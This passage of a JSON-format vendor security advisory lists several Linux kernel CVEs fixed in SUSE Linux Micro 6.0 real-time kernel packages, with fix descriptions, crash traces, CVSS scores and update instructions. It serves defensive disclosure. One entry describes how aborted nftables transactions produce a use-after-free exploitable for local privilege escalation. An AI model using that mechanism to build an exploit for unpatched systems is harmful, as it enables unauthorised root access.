"text": "https://www.suse.com/security/cve/CVE-2026-23102"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narm64/fpsimd: signal: Fix restoration of SVE context\n\nWhen SME is supported, Restoring SVE signal context can go wrong in a\nfew ways, including placing the task into an invalid state where the\nkernel may read from out-of-bounds memory (and may potentially take a\nfatal fault) and/or may kill the task with a SIGKILL.\n\n(1) Restoring a context with SVE_SIG_FLAG_SM set can place the task into\n an invalid state where SVCR.SM is set (and sve_state is non-NULL)\n but TIF_SME is clear, consequently resuting in out-of-bounds memory\n reads and/or killing the task with SIGKILL.\n\n This can only occur in unusual (but legitimate) cases where the SVE\n signal context has either been modified by userspace or was saved in\n the context of another task (e.g. as with CRIU), as otherwise the\n presence of an SVE signal context with SVE_SIG_FLAG_SM implies that\n TIF_SME is already set.\n\n While in this state, task_fpsimd_load() will NOT configure SMCR_ELx\n (leaving some arbitrary value configured in hardware) before\n restoring SVCR and attempting to restore the streaming mode SVE\n registers from memory via sve_load_state(). As the value of\n SMCR_ELx.LEN may be larger than the task\u0027s streaming SVE vector\n length, this may read memory outside of the task\u0027s allocated\n sve_state, reading unrelated data and/or triggering a fault.\n\n While this can result in secrets being loaded into streaming SVE\n registers, these values are never exposed. As TIF_SME is clear,\n fpsimd_bind_task_to_cpu() will configure CPACR_ELx.SMEN to trap EL0\n accesses to streaming mode SVE registers, so these cannot be\n accessed directly at EL0. As fpsimd_save_user_state() verifies the\n live vector length before saving (S)SVE state to memory, no secret\n values can be saved back to memory (and hence cannot be observed via\n ptrace, signals, etc).\n\n When the live vector length doesn\u0027t match the expected vector length\n for the task, fpsimd_save_user_state() will send a fatal SIGKILL\n signal to the task. Hence the task may be killed after executing\n userspace for some period of time.\n\n(2) Restoring a context with SVE_SIG_FLAG_SM clear does not clear the\n task\u0027s SVCR.SM. If SVCR.SM was set prior to restoring the context,\n then the task will be left in streaming mode unexpectedly, and some\n register state will be combined inconsistently, though the task will\n be left in legitimate state from the kernel\u0027s PoV.\n\n This can only occur in unusual (but legitimate) cases where ptrace\n has been used to set SVCR.SM after entry to the sigreturn syscall,\n as syscall entry clears SVCR.SM.\n\n In these cases, the the provided SVE register data will be loaded\n into the task\u0027s sve_state using the non-streaming SVE vector length\n and the FPSIMD registers will be merged into this using the\n streaming SVE vector length.\n\nFix (1) by setting TIF_SME when setting SVCR.SM. This also requires\nensuring that the task\u0027s sme_state has been allocated, but as this could\ncontain live ZA state, it should not be zeroed. Fix (2) by clearing\nSVCR.SM when restoring a SVE signal context with SVE_SIG_FLAG_SM clear.\n\nFor consistency, I\u0027ve pulled the manipulation of SVCR, TIF_SVE, TIF_SME,\nand fp_type earlier, immediately after the allocation of\nsve_state/sme_state, before the restore of the actual register state.\nThis makes it easier to ensure that these are always modified\nconsistently, even if a fault is taken while reading the register data\nfrom the signal context. I do not expect any software to depend on the\nexact state restored when a fault is taken while reading the context.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23102",
"url": "https://www.suse.com/security/cve/CVE-2026-23102"
},
{
"category": "external",
"summary": "SUSE Bug 1257772 for CVE-2026-23102",
"url": "https://bugzilla.suse.com/1257772"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23102"
},
{
"cve": "CVE-2026-23104",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23104"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: fix devlink reload call trace\n\nCommit 4da71a77fc3b (\"ice: read internal temperature sensor\") introduced\ninternal temperature sensor reading via HWMON. ice_hwmon_init() was added\nto ice_init_feature() and ice_hwmon_exit() was added to ice_remove(). As a\nresult if devlink reload is used to reinit the device and then the driver\nis removed, a call trace can occur.\n\nBUG: unable to handle page fault for address: ffffffffc0fd4b5d\nCall Trace:\n string+0x48/0xe0\n vsnprintf+0x1f9/0x650\n sprintf+0x62/0x80\n name_show+0x1f/0x30\n dev_attr_show+0x19/0x60\n\nThe call trace repeats approximately every 10 minutes when system\nmonitoring tools (e.g., sadc) attempt to read the orphaned hwmon sysfs\nattributes that reference freed module memory.\n\nThe sequence is:\n1. Driver load, ice_hwmon_init() gets called from ice_init_feature()\n2. Devlink reload down, flow does not call ice_remove()\n3. Devlink reload up, ice_hwmon_init() gets called from\n ice_init_feature() resulting in a second instance\n4. Driver unload, ice_hwmon_exit() called from ice_remove() leaving the\n first hwmon instance orphaned with dangling pointer\n\nFix this by moving ice_hwmon_exit() from ice_remove() to\nice_deinit_features() to ensure proper cleanup symmetry with\nice_hwmon_init().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23104",
"url": "https://www.suse.com/security/cve/CVE-2026-23104"
},
{
"category": "external",
"summary": "SUSE Bug 1257763 for CVE-2026-23104",
"url": "https://bugzilla.suse.com/1257763"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23104"
},
{
"cve": "CVE-2026-23105",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23105"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: qfq: Use cl_is_active to determine whether class is active in qfq_rm_from_ag\n\nThis is more of a preventive patch to make the code more consistent and\nto prevent possible exploits that employ child qlen manipulations on qfq.\nuse cl_is_active instead of relying on the child qdisc\u0027s qlen to determine\nclass activation.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23105",
"url": "https://www.suse.com/security/cve/CVE-2026-23105"
},
{
"category": "external",
"summary": "SUSE Bug 1257775 for CVE-2026-23105",
"url": "https://bugzilla.suse.com/1257775"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23105"
},
{
"cve": "CVE-2026-23107",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23107"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narm64/fpsimd: signal: Allocate SSVE storage when restoring ZA\n\nThe code to restore a ZA context doesn\u0027t attempt to allocate the task\u0027s\nsve_state before setting TIF_SME. Consequently, restoring a ZA context\ncan place a task into an invalid state where TIF_SME is set but the\ntask\u0027s sve_state is NULL.\n\nIn legitimate but uncommon cases where the ZA signal context was NOT\ncreated by the kernel in the context of the same task (e.g. if the task\nis saved/restored with something like CRIU), we have no guarantee that\nsve_state had been allocated previously. In these cases, userspace can\nenter streaming mode without trapping while sve_state is NULL, causing a\nlater NULL pointer dereference when the kernel attempts to store the\nregister state:\n\n| # ./sigreturn-za\n| Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000\n| Mem abort info:\n| ESR = 0x0000000096000046\n| EC = 0x25: DABT (current EL), IL = 32 bits\n| SET = 0, FnV = 0\n| EA = 0, S1PTW = 0\n| FSC = 0x06: level 2 translation fault\n| Data abort info:\n| ISV = 0, ISS = 0x00000046, ISS2 = 0x00000000\n| CM = 0, WnR = 1, TnD = 0, TagAccess = 0\n| GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n| user pgtable: 4k pages, 52-bit VAs, pgdp=0000000101f47c00\n| [0000000000000000] pgd=08000001021d8403, p4d=0800000102274403, pud=0800000102275403, pmd=0000000000000000\n| Internal error: Oops: 0000000096000046 [#1] SMP\n| Modules linked in:\n| CPU: 0 UID: 0 PID: 153 Comm: sigreturn-za Not tainted 6.19.0-rc1 #1 PREEMPT\n| Hardware name: linux,dummy-virt (DT)\n| pstate: 214000c9 (nzCv daIF +PAN -UAO -TCO +DIT -SSBS BTYPE=--)\n| pc : sve_save_state+0x4/0xf0\n| lr : fpsimd_save_user_state+0xb0/0x1c0\n| sp : ffff80008070bcc0\n| x29: ffff80008070bcc0 x28: fff00000c1ca4c40 x27: 63cfa172fb5cf658\n| x26: fff00000c1ca5228 x25: 0000000000000000 x24: 0000000000000000\n| x23: 0000000000000000 x22: fff00000c1ca4c40 x21: fff00000c1ca4c40\n| x20: 0000000000000020 x19: fff00000ff6900f0 x18: 0000000000000000\n| x17: fff05e8e0311f000 x16: 0000000000000000 x15: 028fca8f3bdaf21c\n| x14: 0000000000000212 x13: fff00000c0209f10 x12: 0000000000000020\n| x11: 0000000000200b20 x10: 0000000000000000 x9 : fff00000ff69dcc0\n| x8 : 00000000000003f2 x7 : 0000000000000001 x6 : fff00000c1ca5b48\n| x5 : fff05e8e0311f000 x4 : 0000000008000000 x3 : 0000000000000000\n| x2 : 0000000000000001 x1 : fff00000c1ca5970 x0 : 0000000000000440\n| Call trace:\n| sve_save_state+0x4/0xf0 (P)\n| fpsimd_thread_switch+0x48/0x198\n| __switch_to+0x20/0x1c0\n| __schedule+0x36c/0xce0\n| schedule+0x34/0x11c\n| exit_to_user_mode_loop+0x124/0x188\n| el0_interrupt+0xc8/0xd8\n| __el0_irq_handler_common+0x18/0x24\n| el0t_64_irq_handler+0x10/0x1c\n| el0t_64_irq+0x198/0x19c\n| Code: 54000040 d51b4408 d65f03c0 d503245f (e5bb5800)\n| ---[ end trace 0000000000000000 ]---\n\nFix this by having restore_za_context() ensure that the task\u0027s sve_state\nis allocated, matching what we do when taking an SME trap. Any live\nSVE/SSVE state (which is restored earlier from a separate signal\ncontext) must be preserved, and hence this is not zeroed.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23107",
"url": "https://www.suse.com/security/cve/CVE-2026-23107"
},
{
"category": "external",
"summary": "SUSE Bug 1257762 for CVE-2026-23107",
"url": "https://bugzilla.suse.com/1257762"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23107"
},
{
"cve": "CVE-2026-23108",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23108"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncan: usb_8dev: usb_8dev_read_bulk_callback(): fix URB memory leak\n\nFix similar memory leak as in commit 7352e1d5932a (\"can: gs_usb:\ngs_usb_receive_bulk_callback(): fix URB memory leak\").\n\nIn usb_8dev_open() -\u003e usb_8dev_start(), the URBs for USB-in transfers are\nallocated, added to the priv-\u003erx_submitted anchor and submitted. In the\ncomplete callback usb_8dev_read_bulk_callback(), the URBs are processed and\nresubmitted. In usb_8dev_close() -\u003e unlink_all_urbs() the URBs are freed by\ncalling usb_kill_anchored_urbs(\u0026priv-\u003erx_submitted).\n\nHowever, this does not take into account that the USB framework unanchors\nthe URB before the complete function is called. This means that once an\nin-URB has been completed, it is no longer anchored and is ultimately not\nreleased in usb_kill_anchored_urbs().\n\nFix the memory leak by anchoring the URB in the\nusb_8dev_read_bulk_callback() to the priv-\u003erx_submitted anchor.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23108",
"url": "https://www.suse.com/security/cve/CVE-2026-23108"
},
{
"category": "external",
"summary": "SUSE Bug 1257770 for CVE-2026-23108",
"url": "https://bugzilla.suse.com/1257770"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23108"
},
{
"cve": "CVE-2026-23110",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23110"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: core: Wake up the error handler when final completions race against each other\n\nThe fragile ordering between marking commands completed or failed so\nthat the error handler only wakes when the last running command\ncompletes or times out has race conditions. These race conditions can\ncause the SCSI layer to fail to wake the error handler, leaving I/O\nthrough the SCSI host stuck as the error state cannot advance.\n\nFirst, there is an memory ordering issue within scsi_dec_host_busy().\nThe write which clears SCMD_STATE_INFLIGHT may be reordered with reads\ncounting in scsi_host_busy(). While the local CPU will see its own\nwrite, reordering can allow other CPUs in scsi_dec_host_busy() or\nscsi_eh_inc_host_failed() to see a raised busy count, causing no CPU to\nsee a host busy equal to the host_failed count.\n\nThis race condition can be prevented with a memory barrier on the error\npath to force the write to be visible before counting host busy\ncommands.\n\nSecond, there is a general ordering issue with scsi_eh_inc_host_failed(). By\ncounting busy commands before incrementing host_failed, it can race with a\nfinal command in scsi_dec_host_busy(), such that scsi_dec_host_busy() does\nnot see host_failed incremented but scsi_eh_inc_host_failed() counts busy\ncommands before SCMD_STATE_INFLIGHT is cleared by scsi_dec_host_busy(),\nresulting in neither waking the error handler task.\n\nThis needs the call to scsi_host_busy() to be moved after host_failed is\nincremented to close the race condition.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23110",
"url": "https://www.suse.com/security/cve/CVE-2026-23110"
},
{
"category": "external",
"summary": "SUSE Bug 1257761 for CVE-2026-23110",
"url": "https://bugzilla.suse.com/1257761"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23110"
},
{
"cve": "CVE-2026-23111",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23111"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: fix inverted genmask check in nft_map_catchall_activate()\n\nnft_map_catchall_activate() has an inverted element activity check\ncompared to its non-catchall counterpart nft_mapelem_activate() and\ncompared to what is logically required.\n\nnft_map_catchall_activate() is called from the abort path to re-activate\ncatchall map elements that were deactivated during a failed transaction.\nIt should skip elements that are already active (they don\u0027t need\nre-activation) and process elements that are inactive (they need to be\nrestored). Instead, the current code does the opposite: it skips inactive\nelements and processes active ones.\n\nCompare the non-catchall activate callback, which is correct:\n\n nft_mapelem_activate():\n if (nft_set_elem_active(ext, iter-\u003egenmask))\n return 0; /* skip active, process inactive */\n\nWith the buggy catchall version:\n\n nft_map_catchall_activate():\n if (!nft_set_elem_active(ext, genmask))\n continue; /* skip inactive, process active */\n\nThe consequence is that when a DELSET operation is aborted,\nnft_setelem_data_activate() is never called for the catchall element.\nFor NFT_GOTO verdict elements, this means nft_data_hold() is never\ncalled to restore the chain-\u003euse reference count. Each abort cycle\npermanently decrements chain-\u003euse. Once chain-\u003euse reaches zero,\nDELCHAIN succeeds and frees the chain while catchall verdict elements\nstill reference it, resulting in a use-after-free.\n\nThis is exploitable for local privilege escalation from an unprivileged\nuser via user namespaces + nftables on distributions that enable\nCONFIG_USER_NS and CONFIG_NF_TABLES.\n\nFix by removing the negation so the check matches nft_mapelem_activate():\nskip active elements, process inactive ones.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23111",
"url": "https://www.suse.com/security/cve/CVE-2026-23111"
},
{
"category": "external",
"summary": "SUSE Bug 1258181 for CVE-2026-23111",
"url": "https://bugzilla.suse.com/1258181"
},
{
"category": "external",
"summary": "SUSE Bug 1258183 for CVE-2026-23111",
"url": "https://bugzilla.suse.com/1258183"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2026-23111"
},
{
"cve": "CVE-2026-23112",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23112"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvmet-tcp: add bounds checks in nvmet_tcp_build_pdu_iovec\n\nnvmet_tcp_build_pdu_iovec() could walk past cmd-\u003ereq.sg when a PDU\nlength or offset exceeds sg_cnt and then use bogus sg-\u003elength/offset\nvalues, leading to _copy_to_iter() GPF/KASAN. Guard sg_idx, remaining\nentries, and sg-\u003elength/offset before building the bvec.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23112",
"url": "https://www.suse.com/security/cve/CVE-2026-23112"
},
{
"category": "external",
"summary": "SUSE Bug 1258184 for CVE-2026-23112",
"url": "https://bugzilla.suse.com/1258184"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23112"
},
{
"cve": "CVE-2026-23113",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23113"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/io-wq: check IO_WQ_BIT_EXIT inside work run loop\n\nCurrently this is checked before running the pending work. Normally this\nis quite fine, as work items either end up blocking (which will create a\nnew worker for other items), or they complete fairly quickly. But syzbot\nreports an issue where io-wq takes seemingly forever to exit, and with a\nbit of debugging, this turns out to be because it queues a bunch of big\n(2GB - 4096b) reads with a /dev/msr* file. Since this file type doesn\u0027t\nsupport -\u003eread_iter(), loop_rw_iter() ends up handling them. Each read\nreturns 16MB of data read, which takes 20 (!!) seconds. With a bunch of\nthese pending, processing the whole chain can take a long time. Easily\nlonger than the syzbot uninterruptible sleep timeout of 140 seconds.\nThis then triggers a complaint off the io-wq exit path:\n\nINFO: task syz.4.135:6326 blocked for more than 143 seconds.\n Not tainted syzkaller #0\n Blocked by coredump.\n\"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\ntask:syz.4.135 state:D stack:26824 pid:6326 tgid:6324 ppid:5957 task_flags:0x400548 flags:0x00080000\nCall Trace:\n \u003cTASK\u003e\n context_switch kernel/sched/core.c:5256 [inline]\n __schedule+0x1139/0x6150 kernel/sched/core.c:6863\n __schedule_loop kernel/sched/core.c:6945 [inline]\n schedule+0xe7/0x3a0 kernel/sched/core.c:6960\n schedule_timeout+0x257/0x290 kernel/time/sleep_timeout.c:75\n do_wait_for_common kernel/sched/completion.c:100 [inline]\n __wait_for_common+0x2fc/0x4e0 kernel/sched/completion.c:121\n io_wq_exit_workers io_uring/io-wq.c:1328 [inline]\n io_wq_put_and_exit+0x271/0x8a0 io_uring/io-wq.c:1356\n io_uring_clean_tctx+0x10d/0x190 io_uring/tctx.c:203\n io_uring_cancel_generic+0x69c/0x9a0 io_uring/cancel.c:651\n io_uring_files_cancel 